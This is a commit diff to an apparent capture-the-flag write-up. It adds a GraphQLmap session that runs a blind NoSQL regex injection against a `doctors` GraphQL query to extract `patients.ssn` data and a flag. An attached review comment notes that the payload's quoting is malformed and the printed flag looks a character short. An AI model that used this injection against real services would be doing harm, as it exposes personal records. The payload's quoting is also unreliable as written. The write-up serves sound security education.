Fix test - Part 2

pull/1/head
Swissky 2019-06-22 15:17:05 +02:00
parent 2d816cd5c9
commit 21b4f0831e
1 changed files with 13 additions and 0 deletions


@ -169,3 +169,16 @@ The injection worked, now we can re-use the payload from the challenge #2 and ex
{% endhighlight %}
Obviously we scripted the data extraction in Python, the script below will get the last flag : `4f537c0a-7da6-4acc-81e1-8c33c02ef3b`.
At that time we were checking if the content of `r.json()['data']['doctors']` was not empty, in order to abstract the data extraction we now take a check input from the user in order to compare the output.
{% highlight json %}
GraphQLmap > nosqli
Query > {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}}
Check > 5d089c51dcab2d0032fdd08d
[+] Data found: 4f537c0a-7da6-4acc-81e1-8c33c02ef3b
{% endhighlight %}
I hope you enjoyed the challenges as I did !
Feel free to share the blog post ! :)
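Review bot: In the added `Query >` line the `options` argument reads `"{\"\"patients.ssn\":1}"`, with a doubled `\"` before `patients.ssn`, so the embedded JSON string is not well formed; it should probably be `"{\"patients.ssn\":1}"`, matching the quoting used in the `search` argument. On the same block: it is opened with `{% highlight json %}` although the content is a GraphQLmap prompt session rather than JSON, so a plain-text lexer would suit it better, and the sentence above it announces "the script below" while what follows is the tool's session output, not the Python script. It would also help to say what the `Check >` value `5d089c51dcab2d0032fdd08d` is compared against, since the text only calls it "a check input", and to confirm the flag as printed: its last group has 11 hex characters, one short of the usual 12 in a UUID.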